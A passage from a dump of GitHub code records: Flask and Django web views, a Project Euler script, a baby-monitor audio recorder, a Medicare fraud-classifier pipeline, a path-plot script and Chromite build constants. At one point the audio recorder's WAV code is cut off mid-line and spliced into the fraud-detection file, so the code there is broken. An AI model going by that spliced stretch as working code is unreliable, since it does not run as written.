item:\n                    if listing[item]!='':\n                        if 'image' in item:\n                            shoes_data['image']=listing[item]\n                        elif 'name' in item:\n                            shoes_data['name'] = listing[item]\n                        else:\n                            shoes_data['link']=listing[item]\n            if shirt_data 
!= {}:\n                outfit.append(shirt_data)\n            if pants_data != {}:\n                outfit.append(pants_data)\n            if accessories_data != {}:\n                outfit.append(accessories_data)\n            if jacket_data != {}:\n                outfit.append(jacket_data)\n            if shoes_data != {}:\n                outfit.append(shoes_data)\n            outfits.append(outfit)\n    return render_template('score.html', title='Final Score', outfits=outfits, text=text.upper())\n\n@app.route('/logout')\ndef logout():\n    if not g.user:\n        return redirect(url_for('login'))\n    session.pop('user_id', None)\n    session.pop('marks', None)\n    return redirect(url_for('home'))\n","repo_name":"Serewaya/Sussed-Prototype","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"26556824412","text":"import time\ndef combinationCount(n, r):\n    # use integer floor division to keep exact big-integer arithmetic\n    return factorial(n) // (factorial(r) * factorial(n - r))\n\ndef factorial(n):\n    fact = 1\n    if n == 0:\n        return fact\n    else:\n        for i in range(1, n + 1):\n            fact *= i\n    return fact\nstart = time.time()\ncount = 0\nfor n in range(1, 101):\n    for r in range(1, 101):\n        if combinationCount(n,r) > 1000000:\n            count += 1\nend = time.time()\nprint(count)\nprint(str(end - start) + \" seconds\")\n","repo_name":"taylordohmen/ProjectEuler","sub_path":"Euler53.py","file_name":"Euler53.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"44315268226","text":"import pyaudio\nimport subprocess\nimport os\nimport time\nimport math\nimport struct\nimport threading\nimport numpy as np\nfrom collections import deque\n\nfrom BabyMonitor.lib import utils\n\nclass NoiseDetector(threading.Thread):\n\n    def __init__(self, do_record=True, do_convert=True):\n        threading.Thread.__init__(self)\n\n        self.name = str(self.__class__.__name__)\n        self.log_manager = utils.LogManager(self.name)\n\n        self.media_dir = os.path.abspath(\"../media\")\n\n        self.FORMAT = pyaudio.paFloat32\n        self.RATE = 48000 # Hz, so samples (bytes) per second\n        self.CHUNK_SIZE = 2048 # How many bytes to read from mic each time (stream.read())\n        self.CHUNKS_PER_SEC = math.floor(self.RATE / self.CHUNK_SIZE) # How many chunks make a second? 
(16.000 bytes/s, each chunk is 1.024 bytes, so 1s is 15 chunks)\n self.CHANNELS = 1\n self.HISTORY_LENGTH = 2 # Seconds of audio cache for prepending to records to prevent chopped phrases (history length + observer length = min record length)\n\n self.audio = pyaudio.PyAudio()\n self.stream = self.get_stream()\n self.threshold = self.determine_threshold()\n self.chunk = None\n self.detect_noise = False\n\n self.record = []\n self.do_record = do_record\n self.do_convert = do_convert\n self.force_recording = False\n self.use_other_to_record = False\n self.saved = False\n\n self._value = 0.0\n\n self.current_file = \"\"\n self.last_file = \"\"\n self.deque_history = deque(maxlen=self.HISTORY_LENGTH * self.CHUNKS_PER_SEC)\n\n def __del__(self):\n self.stream.close()\n self.audio.terminate()\n\n def get_stream(self):\n return self.audio.open(format=self.FORMAT, channels=self.CHANNELS, rate=self.RATE, input=True, frames_per_buffer=self.CHUNK_SIZE)\n\n def determine_threshold(self):\n\n self.log_manager.log(\"Determining threshold...\")\n\n lst_res = []\n for x in range(50):\n block = self.stream.read(self.CHUNK_SIZE, exception_on_overflow=False)\n rms = self.get_rms(block)\n lst_res.append(rms)\n\n threshold = (sum(lst_res) / len(lst_res)) * 1.2\n\n self.log_manager.log(\"Setting threshold to: {0}\".format(threshold))\n\n return threshold\n\n def get_rms(self, block):\n \"\"\"\n Calculate Root Mean Square (noise level) for audio chunk\n\n @param bytes block\n @return float\n \"\"\"\n d = np.frombuffer(block, np.float32).astype(np.float)\n return np.sqrt((d * d).sum() / len(d))\n\n @property\n def value(self):\n return self._value if self._value > self.threshold else 0.0\n\n def start_recording(self):\n\n if not (self.use_other_to_record and self.current_file):\n self.current_file = os.path.join(self.media_dir, \".{0}.avi\".format(utils.get_timestamp()))\n\n if self.current_file:\n dst_dir = os.path.dirname(self.current_file)\n\n if not os.path.exists(dst_dir):\n os.makedirs(dst_dir)\n\n self.log_manager.log(\"Noise detected! 
Recording...\")\n\n def stop_recording(self):\n\n self.last_file = self.current_file\n\n self.record = []\n self.current_file = \"\"\n\n def is_recording(self):\n return len(self.record) > 0\n\n def get_chunk(self):\n return self.chunk\n\n def run(self):\n\n deque_observer = deque(maxlen=utils.OBSERVER_LENGTH * self.CHUNKS_PER_SEC)\n self.deque_history = deque(maxlen=self.HISTORY_LENGTH * self.CHUNKS_PER_SEC)\n\n self.log_manager.log(\"Listening...\")\n\n try:\n while True:\n self.chunk = self.stream.read(self.CHUNK_SIZE, exception_on_overflow=False)\n self.deque_history.append(self.chunk)\n\n rms = self.get_rms(self.chunk)\n deque_observer.append(rms)\n\n self._value = rms\n\n self.detect_noise = sum([x > self.threshold for x in deque_observer]) > 0\n if self.do_record:\n self.do_recording()\n\n pass\n except KeyboardInterrupt:\n self.log_manager.log(\"Interrupted!\")\n\n def do_recording(self):\n\n if (self.use_other_to_record and self.force_recording) or (not self.use_other_to_record and self.detect_noise):\n if not self.is_recording():\n\n self.start_recording()\n\n self.record.append(self.chunk)\n\n elif self.is_recording():\n # self.save(list(self.deque_history) + self.record)\n self.save(self.record)\n\n self.log_manager.log(\"Listening...\")\n\n self.stop_recording()\n\n def save(self, data):\n\n self.log_manager.log(\"Saving audio...\")\n self.saved = False\n if self.current_file:\n data = b''.join(data)\n\n with open(self.current_file, \"wb+\") as f:\n f.write(self.generate_wav(data))\n\n if self.do_convert:\n self.convert_to_mp3(self.current_file)\n\n self.saved = True\n\n def convert_to_mp3(self, file_path=\"\"):\n\n self.log_manager.log(\"Converting audio...\")\n\n try:\n mp3_file = \"{0}.mp3\".format(os.path.splitext(file_path)[0])\n\n lst_cmd = []\n lst_cmd.append(\"ffmpeg\")\n lst_cmd.append(\"-i {}\".format(file_path))\n lst_cmd.append(\"-f mp3\")\n lst_cmd.append(\"{}\".format(mp3_file))\n\n p = subprocess.Popen(\" \".join(lst_cmd), shell=True)\n (output, err) = p.communicate()\n\n if os.path.exists(file_path):\n p.wait()\n os.remove(file_path)\n\n self.current_file = mp3_file\n\n except subprocess.CalledProcessError:\n self.log_manager.log(\"Error converting audio\")\n\n def bytes_to_array(self, bytes, type):\n \"\"\"\n Convert raw audio data to TypedArray\n\n @param bytes bytes\n @return numpy-Array\n \"\"\"\n return np.frombuffer(bytes, dtype=type)\n\n def generate_wav(self, raw):\n \"\"\"\n Create WAVE-file from raw audio chunks\n\n @param bytes raw\n @return bytes\n \"\"\"\n # Check if input format is supported\n if self.FORMAT not in (pyaudio.paFloat32, pyaudio.paInt16):\n print(\"Unsupported format\")\n return\n\n # Convert raw audio bytes to typed array\n samples = self.bytes_to_array(raw, np.float32)\n\n # Get sample size\n sample_size = pyaudio.get_sample_size(self.FORMAT)\n\n # Get data-length\n byte_count = (len(samples)) * sample_size\n\n # Get bits/sample\n bits_per_sample = sample_size * 8\n\n # Calculate frame-size\n frame_size = int(self.CHANNELS * ((bits_per_sample + 7) / 8))\n\n # Container for WAVE-content\n wav = bytearray()\n\n # Start RIFF-Header\n wav.extend(struct.pack('2) & (len(fraud_1)>2) :\r\n tt = ttest_ind(fraud_0, fraud_1)\r\n re_drug_tt[(drugx, colx)] = tt\r\n\r\n\r\n\r\n#Setting Probabilities\r\nProb_005 = [(key, p) for (key, (t, p)) in re_drug_tt.items() if p <=0.05]\r\nprint(len(Prob_005))\r\n\r\ninx=100\r\ndrug_name = Prob_005[inx][0][0]\r\nprint(drug_name)\r\ndf_bar = 
pd.concat([partD_drug_All_Group.get_group((Prob_005[inx][0][0],0.0)), partD_drug_All_Group.get_group((Prob_005[inx][0][0],1.0))])\r\ndf_bar.head()\r\n\r\nFeature_DrugWeighted = []\r\nnew_col_all = []\r\nfor i, p005x in enumerate(Prob_005):\r\n # if i>4:\r\n # break\r\n drug_name = p005x[0][0]\r\n cat_name = p005x[0][1]\r\n\r\n new_col = drug_name + '_' + cat_name\r\n new_col_all.append(new_col)\r\n\r\n drug_0 = partD_drug_All_Group.get_group((drug_name, 0.0))[['npi', cat_name]]\r\n drug_1 = partD_drug_All_Group.get_group((drug_name, 1.0))[['npi', cat_name]]\r\n\r\n drug_01 = pd.concat([drug_0, drug_1])\r\n drug_01.rename(columns={cat_name: new_col}, inplace=True)\r\n Feature_DrugWeighted.append(drug_01)\r\n\r\nnpi_col = Final[['npi']]\r\n\r\nw_npi = []\r\n\r\nfor n, nx in enumerate(Feature_DrugWeighted):\r\n nggx = pd.merge(npi_col, nx.drop_duplicates(['npi']), on='npi', how='left')\r\n\r\n w_npi.append(nggx)\r\n\r\nFinal1 = Final\r\n\r\nfor wx in w_npi:\r\n col_n = wx.columns[1]\r\n Final1[col_n] = wx[col_n].values\r\n\r\nwx = w_npi[0]\r\nwx.columns[1]\r\ncol_n = wx.columns[1]\r\n\r\nlen(wx[col_n].values)\r\nFinal1.fillna(0)\r\n\r\nnew_col_all\r\n\r\nprint(Final1[new_col_all].describe())\r\n\r\nFinal1['drug_mean'] = Final1[new_col_all].mean(axis=1)\r\n\r\n\r\nFinal['drug_mean'] = Final['drug_mean'].map(lambda x: np.log10(x + 1.0))\r\n\r\nFinal1['drug_sum'] = Final1[new_col_all].sum(axis=1)\r\nFinal['drug_sum'] = Final['drug_sum'].map(lambda x: np.log10(x + 1.0))\r\n\r\nFinal1['drug_variance'] = Final1[new_col_all].var(axis=1)\r\n\r\ndf_train, df_valid = train_test_split(Final1, test_size=0.3)\r\n\r\ndf_train.fillna(0)\r\ndf_valid.fillna(0)\r\n\r\n#Create the Specialty Weight\r\nspec_dict =[]\r\nspec_fraud_1 = df_train[df_train['is_fraud']==1]['Specialty']\r\n\r\nfrom collections import Counter\r\ncounts = Counter(spec_fraud_1)\r\nspec_dict = dict(counts)\r\n\r\nFinal1['Spec_Weight'] = Final1['Specialty'].map(lambda x: spec_dict.get(x, 0))\r\n\r\ndf_train, df_valid = train_test_split(Final1, test_size=0.3)\r\n\r\nnumerical_features1 = numerical_features + ['drug_sum','Spec_Weight']\r\n\r\nimport seaborn as sns\r\n\r\n# Default heatmap\r\n# Calculate correlation between each pair of variable\r\ncorr_matrix = df_train.corr()\r\n\r\n# Draw the heatmap with the mask\r\n#sns.heatmap(corr_matrix)\r\n\r\nX= df_train[numerical_features1].values\r\nY = df_train['is_fraud'].values\r\n\r\nparams_0 = {'n_estimators': 300, 'max_depth': 6, 'min_samples_split': 3, 'learning_rate': 0.01}\r\nparams_1 = {'n_estimators': 500, 'max_depth': 10, 'min_samples_split': 5, 'class_weight': {0: 1, 1: 2000}, 'n_jobs': 5}\r\n\r\nscaler = StandardScaler()\r\n\r\nclfs = [\r\n LogisticRegression(C=1e5, class_weight={0: 1, 1: 2000}, n_jobs=5),\r\n\r\n GaussianNB(),\r\n\r\n RandomForestClassifier(**params_1),\r\n\r\n GradientBoostingClassifier(**params_0)\r\n\r\n]\r\n\r\nX_train = df_train[numerical_features1].values\r\n\r\ny_train = df_train['is_fraud'].values\r\n\r\nX_train = scaler.fit_transform(X_train)\r\n\r\nX_valid = df_valid[numerical_features1].values\r\ny_valid = df_valid['is_fraud'].values\r\nX_valid_x = scaler.transform(X_valid)\r\n\r\nprob_result = []\r\ndf_m = []\r\nclfs_fited = []\r\nfor clf in clfs:\r\n print(\"%s:\" % clf.__class__.__name__)\r\n clf.fit(X_train,y_train)\r\n clfs_fited.append(clf)\r\n y_pred = clf.predict(X_valid_x)\r\n prob_pos = clf.predict_proba(X_valid_x)[:, 1]\r\n prob_result.append(prob_pos)\r\n m = confusion_matrix(y_valid, y_pred)\r\n clf_score = brier_score_loss(y_valid, prob_pos, 
pos_label=y_valid.max())\r\n print(\"\\tBrier: %1.5f\" % (clf_score))\r\n print(\"\\tPrecision: %1.5f\" % precision_score(y_valid, y_pred))\r\n print(\"\\tRecall: %1.5f\" % recall_score(y_valid, y_pred))\r\n print(\"\\tF1: %1.5f\" % f1_score(y_valid, y_pred))\r\n print(\"\\tauc: %1.5f\" % roc_auc_score(y_valid, prob_pos))\r\n print(\"\\tAccuracy: %1.5f\\n\" % accuracy_score(y_valid, y_pred))\r\n df_m.append(\r\n pd.DataFrame(m, index=['True Negative', 'True Positive'], columns=['Pred. Negative', 'Pred. Positive'])\r\n )\r\n\r\n\r\nfpr, tpr, thresholds = roc_curve(y_valid, prob_result[2])\r\n\r\nfpr, tpr, thresholds = roc_curve(y_valid, prob_result[2])\r\nroc_auc = auc(fpr, tpr)\r\nplt.plot(fpr, tpr, lw=1, label='ROC (area = %0.2f)' % roc_auc)\r\nplt.xlim([-0.05, 1.05])\r\nplt.ylim([-0.05, 1.05])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Receiver operating characteristic')\r\nplt.legend(loc=\"lower right\")\r\nplt.show()\r\n\r\nprint(m)\r\n\r\ny_pred = clf.predict(X_valid_x)\r\n\r\nfeature_importance = clfs_fited[2].feature_importances_\r\n# make importance relative to max importance\r\nfeature_importance = 100.0 * (feature_importance / feature_importance.max())\r\nsorted_idx = np.argsort(feature_importance)\r\n\r\nfeatures = [numerical_features1[ix] for ix in sorted_idx]\r\nbardata = {\"name\":features[::-1], \"importance percent\":feature_importance[sorted_idx][::-1]}\r\n\r\nplt.figure()\r\n\r\n# Create plot title\r\nplt.title(\"Feature Importance\")\r\n\r\n# Add bars\r\nplt.bar(range(X.shape[1]), feature_importance[sorted_idx])\r\n\r\n# Add feature names as x-axis labels\r\nplt.xticks(range(X.shape[1]), features, rotation=90)\r\n\r\n# Show plot\r\nplt.show()","repo_name":"sklal/DATS6501","sub_path":"FeatureEngineering_Model.py","file_name":"FeatureEngineering_Model.py","file_ext":"py","file_size_in_byte":10485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29164895079","text":"import csv\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nnodeList = list()\noptimalPath = list()\nobstacleList = list()\nnodeListFile = 'nodesSampled_RRTstar.csv'\noptimalPathFile = 'optimalPath_RRTstar.csv'\nobstacleFile = 'obstacles.csv'\n\nenvironmentFile = 'environment.csv'\n\nwith open(nodeListFile) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter = ',')\n for row in csv_reader:\n nodeList.append((float(row[0]), float(row[1])));\n\nwith open(optimalPathFile) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter = ',')\n for row in csv_reader:\n optimalPath.append((float(row[0]),float(row[1])));\n\nwith open(obstacleFile) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter = ',')\n for row in csv_reader:\n obstacleList.append((float(row[0]),float(row[1]),float(row[2]),float(row[3])))\n\n\nwith open(environmentFile) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter = ',')\n N_line = 0\n for row in csv_reader:\n if N_line == 0:\n x_env = float(row[0])\n y_env = float(row[1])\n elif N_line == 1:\n x_start = float(row[0])\n y_start = float(row[1])\n elif N_line == 2:\n x_goal_TL = float(row[0])\n y_goal_TL = float(row[1])\n dx_goal = float(row[2])\n dy_goal = float(row[3])\n N_line += 1\n\nx_nodeList, y_nodeList = zip(*nodeList)\n\nx_optimalPath, y_optimalPath = zip(*optimalPath)\n\n#figure size\nplt.figure(figsize=(16,16))\n# plot optimal path\nplt.plot(x_optimalPath,y_optimalPath,'b-*',linewidth=3)\n\n# plot sampled 
nodes\nplt.plot(x_nodeList,y_nodeList,'r.')\n\n# plot start point\nplt.plot(x_start,y_start,'g.', markersize=30)\n\n# plot goal region\nrect_goal = plt.Rectangle((x_goal_TL,y_goal_TL-dy_goal),dx_goal,dy_goal,color = 'g',alpha=0.3)\nplt.gca().add_patch(rect_goal)\n\n#plot obstacles\nfor ob in obstacleList:\n rect = plt.Rectangle((ob[0],ob[1]-ob[3]),ob[2],ob[3],color='r',alpha=0.3)\n plt.gca().add_patch(rect)\n #plt.add_patch(rect)\n# plt.plot((ob[0],ob[0]+ob[2]),(ob[1],ob[1]),'r-')\n# plt.plot((ob[0]+ob[2], ob[0]+ob[2]),(ob[1],ob[1]-ob[3]),'r-')\n# plt.plot((ob[0],ob[0]),(ob[1],ob[1]-ob[3]),'r-')\n# plt.plot((ob[0],ob[0]+ob[2]),(ob[1]-ob[3],ob[1]-ob[3]),'r-')\n\nplt.xticks(np.arange(0,x_env,step=10))\nplt.yticks(np.arange(0,y_env,step=10))\nplt.show()\n","repo_name":"stumpyx13/PathPlanning","sub_path":"postProcessTest.py","file_name":"postProcessTest.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17393137660","text":"import datetime\nimport json\nimport requests\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, JsonResponse\nfrom rest_framework.decorators import api_view \nfrom rest_framework import viewsets\nfrom .models import Message\nfrom .serializer import LanguageSerializer, MessageSerializer\n\n\n# Create your views here.\ndef home(request):\n \"\"\"\n renders home Screen\n :param:\n :return: \n \"\"\"\n return render(request, 'chatRoomPage/home.html')\n\n\nclass LanguageView(viewsets.ModelViewSet): \n '''\n Legacy Code\n :param: Django prebuilt ViewSet\n :return: \n '''\n queryset = Message.objects.all()\n serializer_class = LanguageSerializer\n\n\ndef chatView(request):\n \"\"\"\n Displays Chat Screen and saves the new chat messages that the user enters. 
\n :param: Request Object\n :return: \n \"\"\"\n sender = request.session['sender']\n receiver = request.session['receiver']\n\n totalMessages = Message.objects.filter(sender = receiver)\n messageList = []\n messagesList1 = []\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '0'\n }\n messageList.append(data)\n \n totalMessages = Message.objects.filter(sender = sender)\n messagesList2 = []\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '1'\n }\n messageList.append(data)\n messageList = sorted(messageList, key = lambda k: k['time'])\n\n context = {\n 'messagesList': messageList,\n 'sender': sender,\n 'receiver': receiver\n }\n\n if request.method == \"POST\":\n message = request.POST.get('messageBox') # response['message']\n res = Message(sender=sender, receiver=receiver, message=message, time= datetime.datetime.now())\n res.save()\n\n totalMessages = Message.objects.filter(sender = receiver)\n messageList = []\n messagesList1 = []\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '0'\n }\n messageList.append(data)\n \n totalMessages = Message.objects.filter(sender = sender)\n messagesList2 = []\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '1'\n }\n messageList.append(data)\n messageList = sorted(messageList, key = lambda k: k['time'])\n\n context = {\n 'messagesList': messageList,\n 'sender': sender,\n 'receiver': receiver\n }\n return render(request, 'chatRoomPage/chatRoom.html', context)\n\n return render(request, 'chatRoomPage/chatRoom.html', context)\n\n\ndef loginView(request):\n \"\"\"\n Displays Login Screen and moves the user to chat View screen.\n Currently we support only two users.\n :param: Request Object\n :return: \n \"\"\"\n if(request.method == \"POST\"):\n\n sender = request.POST.get('Username')\n if(sender == 'kate'):\n receiver = 'john'\n else:\n receiver = 'kate'\n \n request.session.set_test_cookie()\n request.session ['sender'] = sender\n request.session ['receiver'] = receiver\n \n request.method = 'GET'\n totalMessages = Message.objects.filter(sender = sender)\n messagesList1 = []\n messagesList = []\n\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '1'\n }\n messagesList.append(data)\n\n totalMessages = Message.objects.filter(sender = receiver)\n messagesList2 = []\n\n for i in totalMessages:\n data = {\n 'message': i.message,\n 'time': i.time,\n 'sender': '0'\n }\n messagesList.append(data)\n messagesList = sorted(messagesList, key = lambda k: k['time'])\n\n context = {\n 'messagesList': messagesList,\n 'sender': sender,\n 'receiver': receiver\n }\n return render(request, 'chatRoomPage/chatRoom.html', context)\n\n return render(request, 'loginScreen/login.html')\n\n\n\"\"\"\n@api_view(['GET', 'POST'])\ndef getMessageView(request): \n '''\n Get Message API\n Legacy Code\n '''\n response = json.loads(request.body.decode('utf-8'))\n sender = response['sender']\n receiver = response['receiver']\n res = Message.objects.filter(sender=sender, receiver=receiver).values()\n messageList = []\n for i in res:\n print(i)\n print(i['message'])\n messageList.append(i['message'])\n\n return JsonResponse({'message': messageList})\n\n\n@api_view(['GET', 'POST'])\ndef sendMessageView(request): \n '''\n Get Message API\n Legacy code\n '''\n sender = 'user1'\n receiver = 'user2'\n message = '' # response['message']\n res = Message(sender=sender, receiver=receiver, 
message=message)\n res.save()\n return render(request, 'blogPage/chatRoom.html')\n # queryset = Message.objects.all()\n # serializer_class = MessageSerializer\n\"\"\"","repo_name":"jainilparikh/django-Chat-app","sub_path":"chatRoomPage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22682140420","text":"import os\n\nUSE_GOB = False\n\nSOURCE_ROOT = os.path.dirname(os.path.abspath(__file__))\nSOURCE_ROOT = os.path.realpath(os.path.join(SOURCE_ROOT, '..', '..'))\nCROSUTILS_DIR = os.path.join(SOURCE_ROOT, 'src/scripts')\nCHROMITE_BIN_SUBDIR = 'chromite/bin'\nCHROMITE_BIN_DIR = os.path.join(SOURCE_ROOT, CHROMITE_BIN_SUBDIR)\nPATH_TO_CBUILDBOT = os.path.join(CHROMITE_BIN_SUBDIR, 'cbuildbot')\nDEFAULT_CHROOT_DIR = 'chroot'\nSDK_TOOLCHAINS_OUTPUT = 'tmp/toolchain-pkgs'\n\n# Re-execution API constants.\n# Used by --resume and --bootstrap to decipher which options they\n# can pass to the target cbuildbot (since it may not have that\n# option).\n# Format is Major:Minor. Minor is used for tracking new options added\n# that aren't critical to the older version if it's not ran.\n# Major is used for tracking heavy API breakage- for example, no longer\n# supporting the --resume option.\nREEXEC_API_MAJOR = 0\nREEXEC_API_MINOR = 2\nREEXEC_API_VERSION = '%i.%i' % (REEXEC_API_MAJOR, REEXEC_API_MINOR)\n\nGOOGLE_EMAIL = '@google.com'\nCHROMIUM_EMAIL = '@chromium.org'\n\nCORP_DOMAIN = 'corp.google.com'\nGOLO_DOMAIN = 'golo.chromium.org'\n\nGOB_URL = 'https://%s.googlesource.com'\nGOB_REVIEW_URL = 'https://%s-review.googlesource.com'\n\nPUBLIC_GOB_HOST = 'chromium'\nPUBLIC_GOB_URL = GOB_URL % PUBLIC_GOB_HOST\nPUBLIC_GOB_REVIEW_URL = GOB_REVIEW_URL % PUBLIC_GOB_HOST\n\nINTERNAL_GOB_HOST = 'chrome-internal'\nINTERNAL_GOB_URL = GOB_URL % INTERNAL_GOB_HOST\nINTERNAL_GOB_REVIEW_URL = GOB_REVIEW_URL % INTERNAL_GOB_HOST\n\nGERRIT_PORT = '29418'\nGERRIT_INT_PORT = '29419'\n\nGERRIT_HOST = 'gerrit.chromium.org'\nGERRIT_INT_HOST = 'gerrit-int.chromium.org'\nGIT_HOST = 'git.chromium.org'\n\n# TODO(szager): Deprecate these variables in favor of (PUBLIC|INTERNAL)_GOB_*\n# once the migration to git-on-borg is complete. 
Leaving them intact now to\n# make the transition easier.\nif USE_GOB:\n GERRIT_SSH_URL = PUBLIC_GOB_URL\n GERRIT_INT_SSH_URL = INTERNAL_GOB_URL\n GIT_HTTP_URL = PUBLIC_GOB_URL\nelse:\n GERRIT_SSH_URL = 'ssh://%s:%s' % (GERRIT_HOST, GERRIT_PORT)\n GERRIT_INT_SSH_URL = 'ssh://%s:%s' % (GERRIT_INT_HOST, GERRIT_INT_PORT)\n GIT_HTTP_URL = 'http://%s/git' % GIT_HOST\n\nREPO_PROJECT = 'external/repo'\nREPO_URL = '%s/%s' % (GIT_HTTP_URL, REPO_PROJECT)\n\nCHROMITE_PROJECT = 'chromiumos/chromite'\nCHROMITE_URL = '%s/%s' % (GIT_HTTP_URL, CHROMITE_PROJECT)\nCHROMIUM_SRC_PROJECT = 'chromium/src'\n\nMANIFEST_PROJECT = 'chromiumos/manifest'\nMANIFEST_INT_PROJECT = 'chromeos/manifest-internal'\n\nMANIFEST_URL = '%s/%s' % (GIT_HTTP_URL, MANIFEST_PROJECT)\nMANIFEST_INT_URL = '%s/%s' % (GERRIT_INT_SSH_URL, MANIFEST_INT_PROJECT)\n\nDEFAULT_MANIFEST = 'default.xml'\nSHARED_CACHE_ENVVAR = 'CROS_CACHEDIR'\n\n# CrOS remotes specified in the manifests.\nEXTERNAL_REMOTE = 'cros'\nINTERNAL_REMOTE = 'cros-internal'\nCROS_REMOTES = {\n EXTERNAL_REMOTE : GERRIT_SSH_URL,\n INTERNAL_REMOTE : GERRIT_INT_SSH_URL\n}\n\n# TODO(sosa): Move to manifest-versions-external once its created\nMANIFEST_VERSIONS_SUFFIX = '/chromiumos/manifest-versions'\nMANIFEST_VERSIONS_INT_SUFFIX = '/chromeos/manifest-versions'\nMANIFEST_VERSIONS_GS_URL = 'gs://chromeos-manifest-versions'\n\nPATCH_BRANCH = 'patch_branch'\nSTABLE_EBUILD_BRANCH = 'stabilizing_branch'\nMERGE_BRANCH = 'merge_branch'\n\n# These branches are deleted at the beginning of every buildbot run.\nCREATED_BRANCHES = [\n PATCH_BRANCH,\n STABLE_EBUILD_BRANCH,\n MERGE_BRANCH\n]\n\n# Constants for uprevving Chrome\n\n# Portage category and package name for Chrome.\nCHROME_PN = 'chromeos-chrome'\nCHROME_CP = 'chromeos-base/%s' % CHROME_PN\n\n# Chrome URL where PGO data is stored.\nCHROME_PGO_URL = ('gs://chromeos-prebuilt/pgo-job/canonicals/'\n '%(package)s-%(arch)s-%(version_no_rev)s.pgo.tar.bz2')\n\n# Chrome use flags\nUSE_CHROME_INTERNAL = 'chrome_internal'\nUSE_CHROME_PDF = 'chrome_pdf'\nUSE_PGO_GENERATE = 'pgo_generate'\nUSE_PGO_USE = 'pgo_use'\n\n# PGO-specific constants.\nPGO_GENERATE_DISK_LAYOUT = '4gb-rootfs'\nPGO_USE_TIMEOUT = 180 * 60\n\n# Builds and validates _alpha ebuilds. These builds sync to the latest\n# revsion of the Chromium src tree and build with that checkout.\nCHROME_REV_TOT = 'tot'\n\n# Builds and validates chrome at a given revision through cbuildbot\n# --chrome_version\nCHROME_REV_SPEC = 'spec'\n\n# Builds and validates the latest Chromium release as defined by\n# ~/trunk/releases in the Chrome src tree. These ebuilds are suffixed with rc.\nCHROME_REV_LATEST = 'latest_release'\n\n# Builds and validates the latest Chromium release for a specific Chromium\n# branch that we want to watch. These ebuilds are suffixed with rc.\nCHROME_REV_STICKY = 'stable_release'\n\n# Builds and validates Chromium for a pre-populated directory.\n# Also uses _alpha, since portage doesn't have anything lower.\nCHROME_REV_LOCAL = 'local'\nVALID_CHROME_REVISIONS = [CHROME_REV_TOT, CHROME_REV_LATEST,\n CHROME_REV_STICKY, CHROME_REV_LOCAL, CHROME_REV_SPEC]\n\n\n# Build types supported.\n\n# TODO(sosa): Deprecate PFQ type.\n# Incremental builds that are built using binary packages when available.\n# These builds have less validation than other build types.\nINCREMENTAL_TYPE = 'binary'\n\n# These builds serve as PFQ builders. 
This is being deprecated.\nPFQ_TYPE = 'pfq'\n\n# TODO(sosa): Deprecate CQ type.\n# Commit Queue type that is similar to PFQ_TYPE but uses Commit Queue sync\n# logic.\nCOMMIT_QUEUE_TYPE = 'commit-queue'\n\n# Hybrid Commit and PFQ type. Ultimate protection.\nPALADIN_TYPE = 'paladin'\n\n# A builder that kicks off Pre-CQ builders that bless the purest CLs.\nPRE_CQ_LAUNCHER_TYPE = 'priest'\n\n# Chrome PFQ type. Incremental build type that builds and validates new\n# versions of Chrome. Only valid if set with CHROME_REV. See\n# VALID_CHROME_REVISIONS for more information.\nCHROME_PFQ_TYPE = 'chrome'\n\n# Builds from source and non-incremental. This builds fully wipe their\n# chroot before the start of every build and no not use a BINHOST.\nBUILD_FROM_SOURCE_TYPE = 'full'\n\n# Full but with versioned logic.\nCANARY_TYPE = 'canary'\n\n# Special build type for Chroot builders. These builds focus on building\n# toolchains and validate that they work.\nCHROOT_BUILDER_TYPE = 'chroot'\nCHROOT_BUILDER_BOARD = 'amd64-host'\n\n# Build that refreshes the online Portage package status spreadsheet.\nREFRESH_PACKAGES_TYPE = 'refresh_packages'\n\nVALID_BUILD_TYPES = (\n PALADIN_TYPE,\n INCREMENTAL_TYPE,\n BUILD_FROM_SOURCE_TYPE,\n CANARY_TYPE,\n CHROOT_BUILDER_TYPE,\n CHROOT_BUILDER_BOARD,\n CHROME_PFQ_TYPE,\n PFQ_TYPE,\n PRE_CQ_LAUNCHER_TYPE,\n REFRESH_PACKAGES_TYPE,\n)\n\n# The name of the builder used to launch the pre-CQ.\nPRE_CQ_BUILDER_NAME = 'pre-cq-group'\n\n\n# Define pool of machines for Hardware tests.\nHWTEST_DEFAULT_NUM = 6\nHWTEST_TRYBOT_NUM = 1\nHWTEST_MACH_POOL = 'bvt'\nHWTEST_PALADIN_POOL = 'cq'\nHWTEST_CHROME_PFQ_POOL = 'chromepfq'\nHWTEST_CHROME_PERF_POOL = 'chromeperf'\nHWTEST_TRYBOT_POOL = 'try-bot'\n# Currently supported hwtest boards.\nHWTEST_BOARD_WHITELIST = ['x86-mario', 'lumpy', 'daisy']\nHWTEST_AU_SUITE = 'au'\n\n# Defines VM Test types.\nSMOKE_SUITE_TEST_TYPE = 'smoke_suite'\nSIMPLE_AU_TEST_TYPE = 'pfq_suite'\nFULL_AU_TEST_TYPE = 'full_suite'\n\nVALID_AU_TEST_TYPES = 